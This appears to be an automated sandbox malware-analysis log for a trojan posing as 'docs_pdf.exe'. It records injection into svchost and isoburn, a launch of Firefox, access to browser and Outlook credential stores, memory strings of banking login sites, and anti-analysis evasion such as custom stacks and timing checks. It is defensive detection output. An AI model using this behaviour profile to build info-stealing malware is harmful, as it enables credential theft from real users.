            Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@7/5@16/10
            Source: C:\Users\user\Desktop\docs_pdf.exeCode function: 0_2_0015A2D5 GetLastError,FormatMessageW,0_2_0015A2D5
            Source: C:\Users\user\Desktop\docs_pdf.exeCode function: 0_2_00148713 AdjustTokenPrivileges,CloseHandle,0_2_00148713
            Source: C:\Users\user\Desktop\docs_pdf.exeCode function: 0_2_00148CC3 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,0_2_00148CC3
            Source: C:\Users\user\Desktop\docs_pdf.exeCode function: 0_2_0015B59E SetErrorMode,GetDiskFreeSpaceExW,SetErrorMode,0_2_0015B59E
            Source: C:\Users\user\Desktop\docs_pdf.exeCode function: 0_2_0016F121 CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,0_2_0016F121
            Source: C:\Users\user\Desktop\docs_pdf.exeCode function: 0_2_0015C602 CoInitialize,CoCreateInstance,CoUninitialize,0_2_0015C602
            Source: C:\Users\user\Desktop\docs_pdf.exeCode function: 0_2_000F4FE9 CreateStreamOnHGlobal,FindResourceExW,LoadResource,SizeofResource,LockResource,0_2_000F4FE9
            Source: C:\Users\user\Desktop\docs_pdf.exeFile created: C:\Users\user\AppData\Local\Temp\autD7A1.tmpJump to behavior
            Source: C:\Users\user\Desktop\docs_pdf.exeCommand line argument: P0_2_000F492E
            Source: C:\Users\user\Desktop\docs_pdf.exeCommand line argument: P0_2_000F492E
            Source: docs_pdf.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            Source: C:\Program Files\Mozilla Firefox\firefox.exeFile read: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.iniJump to behavior
            Source: C:\Users\user\Desktop\docs_pdf.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
            Source: isoburn.exe, 00000005.00000003.2670309488.0000000000C4D000.00000004.00000020.00020000.00000000.sdmp, isoburn.exe, 00000005.00000003.2668810473.0000000000C42000.00000004.00000020.00020000.00000000.sdmp, isoburn.exe, 00000005.00000003.2668668394.0000000000C21000.00000004.00000020.00020000.00000000.sdmp, isoburn.exe, 00000005.00000002.4549871592.0000000000C70000.00000004.00000020.00020000.00000000.sdmp, isoburn.exe, 00000005.00000002.4549871592.0000000000C42000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
            Source: docs_pdf.exeReversingLabs: Detection: 65%
            Source: unknownProcess created: C:\Users\user\Desktop\docs_pdf.exe "C:\Users\user\Desktop\docs_pdf.exe"
            Source: C:\Users\user\Desktop\docs_pdf.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\docs_pdf.exe"
            Source: C:\Program Files (x86)\JQZieOSbaUIVYINXlpesTIPdKuZxBeJrwziBncLormJlccPJC\HDtHilbfKZE.exeProcess created: C:\Windows\SysWOW64\isoburn.exe "C:\Windows\SysWOW64\isoburn.exe"
            Source: C:\Windows\SysWOW64\isoburn.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
            Source: C:\Users\user\Desktop\docs_pdf.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\docs_pdf.exe"Jump to behavior
            Source: C:\Program Files (x86)\JQZieOSbaUIVYINXlpesTIPdKuZxBeJrwziBncLormJlccPJC\HDtHilbfKZE.exeProcess created: C:\Windows\SysWOW64\isoburn.exe "C:\Windows\SysWOW64\isoburn.exe"Jump to behavior
            Source: C:\Windows\SysWOW64\isoburn.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
            Source: C:\Users\user\Desktop\docs_pdf.exeSection loaded: wsock32.dllJump to behavior
            Source: C:\Users\user\Desktop\docs_pdf.exeSection loaded: version.dllJump to behavior
            Source: C:\Users\user\Desktop\docs_pdf.exeSection loaded: winmm.dllJump to behavior
            Source: C:\Users\user\Desktop\docs_pdf.exeSection loaded: mpr.dllJump to behavior
            Source: C:\Users\user\Desktop\docs_pdf.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Users\user\Desktop\docs_pdf.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Users\user\Desktop\docs_pdf.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Users\user\Desktop\docs_pdf.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Users\user\Desktop\docs_pdf.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Users\user\Desktop\docs_pdf.exeSection loaded: ntmarta.dllJump to behavior
            Source: C:\Windows\SysWOW64\isoburn.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Windows\SysWOW64\isoburn.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Windows\SysWOW64\isoburn.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\SysWOW64\isoburn.exeSection loaded: ieframe.dllJump to behavior
            Source: C:\Windows\SysWOW64\isoburn.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Windows\SysWOW64\isoburn.exeSection loaded: netapi32.dllJump to behavior
            Source: C:\Windows\SysWOW64\isoburn.exeSection loaded: version.dllJump to behavior
            Source: C:\Windows\SysWOW64\isoburn.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Windows\SysWOW64\isoburn.exeSection loaded: winhttp.dllJump to behavior
            Source: C:\Windows\SysWOW64\isoburn.exeSection loaded: wkscli.dllJump to behavior
            Source: C:\Windows\SysWOW64\isoburn.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Windows\SysWOW64\isoburn.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\SysWOW64\isoburn.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Windows\SysWOW64\isoburn.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Windows\SysWOW64\isoburn.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\isoburn.exeSection loaded: secur32.dllJump to behavior
            Source: C:\Windows\SysWOW64\isoburn.exeSection loaded: mlang.dllJump to behavior
            Source: C:\Windows\SysWOW64\isoburn.exeSection loaded: propsys.dllJump to behavior
            Source: C:\Windows\SysWOW64\isoburn.exeSection loaded: winsqlite3.dllJump to behavior
            Source: C:\Windows\SysWOW64\isoburn.exeSection loaded: vaultcli.dllJump to behavior
            Source: C:\Windows\SysWOW64\isoburn.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Windows\SysWOW64\isoburn.exeSection loaded: dpapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\isoburn.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Program Files (x86)\JQZieOSbaUIVYINXlpesTIPdKuZxBeJrwziBncLormJlccPJC\HDtHilbfKZE.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Program Files (x86)\JQZieOSbaUIVYINXlpesTIPdKuZxBeJrwziBncLormJlccPJC\HDtHilbfKZE.exeSection loaded: mswsock.dllJump to behavior
            Source: C:\Program Files (x86)\JQZieOSbaUIVYINXlpesTIPdKuZxBeJrwziBncLormJlccPJC\HDtHilbfKZE.exeSection loaded: dnsapi.dllJump to behavior
            Source: C:\Program Files (x86)\JQZieOSbaUIVYINXlpesTIPdKuZxBeJrwziBncLormJlccPJC\HDtHilbfKZE.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Program Files (x86)\JQZieOSbaUIVYINXlpesTIPdKuZxBeJrwziBncLormJlccPJC\HDtHilbfKZE.exeSection loaded: fwpuclnt.dllJump to behavior
            Source: C:\Program Files (x86)\JQZieOSbaUIVYINXlpesTIPdKuZxBeJrwziBncLormJlccPJC\HDtHilbfKZE.exeSection loaded: rasadhlp.dllJump to behavior
            Source: C:\Windows\SysWOW64\isoburn.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{3C374A40-BAE4-11CF-BF7D-00AA006946EE}\InProcServer32Jump to behavior
            Source: C:\Windows\SysWOW64\isoburn.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\Jump to behavior
            Source: docs_pdf.exeStatic file information: File size 1193984 > 1048576
            Source: docs_pdf.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
            Source: docs_pdf.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
            Source: docs_pdf.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
            Source: docs_pdf.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
            Source: docs_pdf.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
            Source: docs_pdf.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
            Source: docs_pdf.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
            Source: Binary string: isoburn.pdb source: svchost.exe, 00000002.00000003.2460271834.000000000301B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2460332566.0000000003034000.00000004.00000020.00020000.00000000.sdmp, HDtHilbfKZE.exe, 00000004.00000003.2430278443.000000000104B000.00000004.00000020.00020000.00000000.sdmp, HDtHilbfKZE.exe, 00000004.00000002.4550345852.0000000001064000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: isoburn.pdbGCTL source: svchost.exe, 00000002.00000003.2460271834.000000000301B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2460332566.0000000003034000.00000004.00000020.00020000.00000000.sdmp, HDtHilbfKZE.exe, 00000004.00000003.2430278443.000000000104B000.00000004.00000020.00020000.00000000.sdmp, HDtHilbfKZE.exe, 00000004.00000002.4550345852.0000000001064000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: HDtHilbfKZE.exe, 00000004.00000000.2413958648.000000000008E000.00000002.00000001.01000000.00000005.sdmp, HDtHilbfKZE.exe, 00000007.00000000.2554531949.000000000008E000.00000002.00000001.01000000.00000005.sdmp
            Source: Binary string: wntdll.pdbUGP source: docs_pdf.exe, 00000000.00000003.2097373194.0000000003BE0000.00000004.00001000.00020000.00000000.sdmp, docs_pdf.exe, 00000000.00000003.2103113163.0000000003D80000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2491458027.000000000389E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2491458027.0000000003700000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2403405622.0000000003500000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2401985926.0000000003300000.00000004.00000020.00020000.00000000.sdmp, isoburn.exe, 00000005.00000002.4551471544.00000000049CE000.00000040.00001000.00020000.00000000.sdmp, isoburn.exe, 00000005.00000003.2493801369.0000000004684000.00000004.00000020.00020000.00000000.sdmp, isoburn.exe, 00000005.00000003.2491393754.00000000044D9000.00000004.00000020.00020000.00000000.sdmp, isoburn.exe, 00000005.00000002.4551471544.0000000004830000.00000040.00001000.00020000.00000000.sdmp
            Source: Binary string: wntdll.pdb source: docs_pdf.exe, 00000000.00000003.2097373194.0000000003BE0000.00000004.00001000.00020000.00000000.sdmp, docs_pdf.exe, 00000000.00000003.2103113163.0000000003D80000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000002.00000002.2491458027.000000000389E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2491458027.0000000003700000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2403405622.0000000003500000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2401985926.0000000003300000.00000004.00000020.00020000.00000000.sdmp, isoburn.exe, isoburn.exe, 00000005.00000002.4551471544.00000000049CE000.00000040.00001000.00020000.00000000.sdmp, isoburn.exe, 00000005.00000003.2493801369.0000000004684000.00000004.00000020.00020000.00000000.sdmp, isoburn.exe, 00000005.00000003.2491393754.00000000044D9000.00000004.00000020.00020000.00000000.sdmp, isoburn.exe, 00000005.00000002.4551471544.0000000004830000.00000040.00001000.00020000.00000000.sdmp
            Source: Binary string: svchost.pdb source: isoburn.exe, 00000005.00000002.4549871592.0000000000BC7000.00000004.00000020.00020000.00000000.sdmp, isoburn.exe, 00000005.00000002.4553311671.0000000004E5C000.00000004.10000000.00040000.00000000.sdmp, HDtHilbfKZE.exe, 00000007.00000000.2555156693.0000000002DDC000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000A.00000002.2774571608.0000000038CBC000.00000004.80000000.00040000.00000000.sdmp
            Source: Binary string: svchost.pdbUGP source: isoburn.exe, 00000005.00000002.4549871592.0000000000BC7000.00000004.00000020.00020000.00000000.sdmp, isoburn.exe, 00000005.00000002.4553311671.0000000004E5C000.00000004.10000000.00040000.00000000.sdmp, HDtHilbfKZE.exe, 00000007.00000000.2555156693.0000000002DDC000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000A.00000002.2774571608.0000000038CBC000.00000004.80000000.00040000.00000000.sdmp
            Source: docs_pdf.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
            Source: docs_pdf.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
            Source: docs_pdf.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
            Source: docs_pdf.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
            Source: docs_pdf.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
            Source: C:\Users\user\Desktop\docs_pdf.exeCode function: 0_2_0016C304 LoadLibraryA,GetProcAddress,0_2_0016C304
            Source: C:\Users\user\Desktop\docs_pdf.exeCode function: 0_2_00118B85 push ecx; ret 0_2_00118B98
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0041905C push 72B82297h; ret 2_2_004190E5
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00408028 pushfd ; retf 2_2_00408034
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00419151 push ecx; iretd 2_2_00419152
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004089B6 push ecx; retf 2_2_004089C2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004162D3 push esi; retf 2_2_004162DE
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00403AB0 push eax; ret 2_2_00403AB2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00407C44 pushfd ; retf 2_2_00407C45
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0041856F push edx; ret 2_2_00418572
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0040ADF5 push eax; retf 2_2_0040AE11
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00405776 pushad ; retf 2_2_00405785
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00411F7B push ebx; retf 2_2_00411F7E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0370225F pushad ; ret 2_2_037027F9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037027FA pushad ; ret 2_2_037027F9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037309AD push ecx; mov dword ptr [esp], ecx2_2_037309B6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0370283D push eax; iretd 2_2_03702858
            Source: C:\Program Files (x86)\JQZieOSbaUIVYINXlpesTIPdKuZxBeJrwziBncLormJlccPJC\HDtHilbfKZE.exeCode function: 4_2_03A36381 push 72B82297h; ret 4_2_03A3640A
            Source: C:\Program Files (x86)\JQZieOSbaUIVYINXlpesTIPdKuZxBeJrwziBncLormJlccPJC\HDtHilbfKZE.exeCode function: 4_2_03A2534D pushfd ; retf 4_2_03A25359
            Source: C:\Program Files (x86)\JQZieOSbaUIVYINXlpesTIPdKuZxBeJrwziBncLormJlccPJC\HDtHilbfKZE.exeCode function: 4_2_03A2F2A0 push ebx; retf 4_2_03A2F2A3
            Source: C:\Program Files (x86)\JQZieOSbaUIVYINXlpesTIPdKuZxBeJrwziBncLormJlccPJC\HDtHilbfKZE.exeCode function: 4_2_03A22A9B pushad ; retf 4_2_03A22AAA
            Source: C:\Program Files (x86)\JQZieOSbaUIVYINXlpesTIPdKuZxBeJrwziBncLormJlccPJC\HDtHilbfKZE.exeCode function: 4_2_03A2811A push eax; retf 4_2_03A28136
            Source: C:\Program Files (x86)\JQZieOSbaUIVYINXlpesTIPdKuZxBeJrwziBncLormJlccPJC\HDtHilbfKZE.exeCode function: 4_2_03A35894 push edx; ret 4_2_03A35897
            Source: C:\Program Files (x86)\JQZieOSbaUIVYINXlpesTIPdKuZxBeJrwziBncLormJlccPJC\HDtHilbfKZE.exeCode function: 4_2_03A24F69 pushfd ; retf 4_2_03A24F6A
            Source: C:\Program Files (x86)\JQZieOSbaUIVYINXlpesTIPdKuZxBeJrwziBncLormJlccPJC\HDtHilbfKZE.exeCode function: 4_2_03A3A655 push edi; retf 4_2_03A3A65F
            Source: C:\Program Files (x86)\JQZieOSbaUIVYINXlpesTIPdKuZxBeJrwziBncLormJlccPJC\HDtHilbfKZE.exeCode function: 4_2_03A25CDB push ecx; retf 4_2_03A25CE7
            Source: C:\Program Files (x86)\JQZieOSbaUIVYINXlpesTIPdKuZxBeJrwziBncLormJlccPJC\HDtHilbfKZE.exeCode function: 4_2_03A36476 push ecx; iretd 4_2_03A36477
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 5_2_048327FA pushad ; ret 5_2_048327F9
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 5_2_0483225F pushad ; ret 5_2_048327F9
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 5_2_0483283D push eax; iretd 5_2_04832858
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 5_2_048609AD push ecx; mov dword ptr [esp], ecx5_2_048609B6
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 5_2_00804191 pushfd ; retf 5_2_00804192
            Source: C:\Users\user\Desktop\docs_pdf.exeCode function: 0_2_000F4A35 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,0_2_000F4A35
            Source: C:\Users\user\Desktop\docs_pdf.exeCode function: 0_2_001755FD IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,0_2_001755FD
            Source: C:\Users\user\Desktop\docs_pdf.exeCode function: 0_2_001133C7 EncodePointer,__initp_misc_winsig,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_001133C7
            Source: C:\Users\user\Desktop\docs_pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\isoburn.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\isoburn.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\isoburn.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\isoburn.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\isoburn.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior

            Malware Analysis System Evasion

            barindex
            Switches to a custom stack to bypass stack traces
            Source: C:\Users\user\Desktop\docs_pdf.exeAPI/Special instruction interceptor: Address: 36E3204
            Source: C:\Windows\SysWOW64\isoburn.exeAPI/Special instruction interceptor: Address: 7FFDB442D324
            Source: C:\Windows\SysWOW64\isoburn.exeAPI/Special instruction interceptor: Address: 7FFDB442D7E4
            Source: C:\Windows\SysWOW64\isoburn.exeAPI/Special instruction interceptor: Address: 7FFDB442D944
            Source: C:\Windows\SysWOW64\isoburn.exeAPI/Special instruction interceptor: Address: 7FFDB442D504
            Source: C:\Windows\SysWOW64\isoburn.exeAPI/Special instruction interceptor: Address: 7FFDB442D544
            Source: C:\Windows\SysWOW64\isoburn.exeAPI/Special instruction interceptor: Address: 7FFDB442D1E4
            Source: C:\Windows\SysWOW64\isoburn.exeAPI/Special instruction interceptor: Address: 7FFDB4430154
            Source: C:\Windows\SysWOW64\isoburn.exeAPI/Special instruction interceptor: Address: 7FFDB442DA44
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0377096E rdtsc 2_2_0377096E
            Source: C:\Windows\SysWOW64\isoburn.exeWindow / User API: threadDelayed 9846Jump to behavior
            Source: C:\Users\user\Desktop\docs_pdf.exeEvasive API call chain: GetSystemTimeAsFileTime,DecisionNodesgraph_0-99280
            Source: C:\Users\user\Desktop\docs_pdf.exeAPI coverage: 4.5 %
            Source: C:\Windows\SysWOW64\svchost.exeAPI coverage: 0.6 %
            Source: C:\Windows\SysWOW64\isoburn.exeAPI coverage: 2.6 %
            Source: C:\Windows\SysWOW64\isoburn.exe TID: 1780Thread sleep count: 126 > 30Jump to behavior
            Source: C:\Windows\SysWOW64\isoburn.exe TID: 1780Thread sleep time: -252000s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\isoburn.exe TID: 1780Thread sleep count: 9846 > 30Jump to behavior
            Source: C:\Windows\SysWOW64\isoburn.exe TID: 1780Thread sleep time: -19692000s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\JQZieOSbaUIVYINXlpesTIPdKuZxBeJrwziBncLormJlccPJC\HDtHilbfKZE.exe TID: 1540Thread sleep time: -70000s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\JQZieOSbaUIVYINXlpesTIPdKuZxBeJrwziBncLormJlccPJC\HDtHilbfKZE.exe TID: 1540Thread sleep count: 38 > 30Jump to behavior
            Source: C:\Program Files (x86)\JQZieOSbaUIVYINXlpesTIPdKuZxBeJrwziBncLormJlccPJC\HDtHilbfKZE.exe TID: 1540Thread sleep time: -57000s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\JQZieOSbaUIVYINXlpesTIPdKuZxBeJrwziBncLormJlccPJC\HDtHilbfKZE.exe TID: 1540Thread sleep count: 39 > 30Jump to behavior
            Source: C:\Program Files (x86)\JQZieOSbaUIVYINXlpesTIPdKuZxBeJrwziBncLormJlccPJC\HDtHilbfKZE.exe TID: 1540Thread sleep time: -39000s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\isoburn.exeLast function: Thread delayed
            Source: C:\Windows\SysWOW64\isoburn.exeLast function: Thread delayed
            Source: C:\Users\user\Desktop\docs_pdf.exeCode function: 0_2_00154696 GetFileAttributesW,FindFirstFileW,FindClose,0_2_00154696
            Source: C:\Users\user\Desktop\docs_pdf.exeCode function: 0_2_0015C93C FindFirstFileW,FindClose,0_2_0015C93C
            Source: C:\Users\user\Desktop\docs_pdf.exeCode function: 0_2_0015C9C7 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,0_2_0015C9C7
            Source: C:\Users\user\Desktop\docs_pdf.exeCode function: 0_2_0015F200 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_0015F200
            Source: C:\Users\user\Desktop\docs_pdf.exeCode function: 0_2_0015F35D SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_0015F35D
            Source: C:\Users\user\Desktop\docs_pdf.exeCode function: 0_2_0015F65E FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,0_2_0015F65E
            Source: C:\Users\user\Desktop\docs_pdf.exeCode function: 0_2_00153A2B FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_00153A2B
            Source: C:\Users\user\Desktop\docs_pdf.exeCode function: 0_2_00153D4E FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_00153D4E
            Source: C:\Users\user\Desktop\docs_pdf.exeCode function: 0_2_0015BF27 FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,0_2_0015BF27
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 5_2_0081BF20 FindFirstFileW,FindNextFileW,FindClose,5_2_0081BF20
            Source: C:\Users\user\Desktop\docs_pdf.exeCode function: 0_2_000F4AFE GetVersionExW,GetCurrentProcess,IsWow64Process,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,0_2_000F4AFE
            Source: x1j09f428.5.drBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696487552
            Source: isoburn.exe, 00000005.00000002.4555382292.00000000078E9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Test URL for global passwords blocklistVMware20,116964
            Source: x1j09f428.5.drBinary or memory string: secure.bankofamerica.comVMware20,11696487552|UE
            Source: x1j09f428.5.drBinary or memory string: account.microsoft.com/profileVMware20,11696487552u
            Source: x1j09f428.5.drBinary or memory string: discord.comVMware20,11696487552f
            Source: x1j09f428.5.drBinary or memory string: bankofamerica.comVMware20,11696487552x
            Source: x1j09f428.5.drBinary or memory string: www.interactivebrokers.comVMware20,11696487552}
            Source: x1j09f428.5.drBinary or memory string: ms.portal.azure.comVMware20,11696487552
            Source: x1j09f428.5.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696487552
            Source: x1j09f428.5.drBinary or memory string: Interactive Brokers - COM.HKVMware20,11696487552
            Source: x1j09f428.5.drBinary or memory string: global block list test formVMware20,11696487552
            Source: x1j09f428.5.drBinary or memory string: tasks.office.comVMware20,11696487552o
            Source: isoburn.exe, 00000005.00000002.4555382292.00000000078E9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMware20,11696487552j
            Source: isoburn.exe, 00000005.00000002.4549871592.0000000000BC7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
            Source: isoburn.exe, 00000005.00000002.4555382292.00000000078E9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: bankofamerica.comVMware20,10
            Source: x1j09f428.5.drBinary or memory string: AMC password management pageVMware20,11696487552
            Source: x1j09f428.5.drBinary or memory string: interactivebrokers.co.inVMware20,11696487552d
            Source: x1j09f428.5.drBinary or memory string: interactivebrokers.comVMware20,11696487552
            Source: isoburn.exe, 00000005.00000002.4555382292.00000000078E9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: hange Transaction PasswordVMware20,11696487552
            Source: x1j09f428.5.drBinary or memory string: dev.azure.comVMware20,11696487552j
            Source: x1j09f428.5.drBinary or memory string: Interactive Brokers - HKVMware20,11696487552]
            Source: isoburn.exe, 00000005.00000002.4555382292.00000000078E9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: teractivebrokers.co.inVMware20,11696487552d
            Source: x1j09f428.5.drBinary or memory string: microsoft.visualstudio.comVMware20,11696487552x
            Source: x1j09f428.5.drBinary or memory string: netportal.hdfcbank.comVMware20,11696487552
            Source: isoburn.exe, 00000005.00000002.4555382292.00000000078E9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: turbotax.intuit.comVMware20,11696487552e
            Source: x1j09f428.5.drBinary or memory string: trackpan.utiitsl.comVMware20,11696487552h
            Source: isoburn.exe, 00000005.00000002.4555382292.00000000078E9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: global block list test formVMware20,1169648755
            Source: x1j09f428.5.drBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696487552z
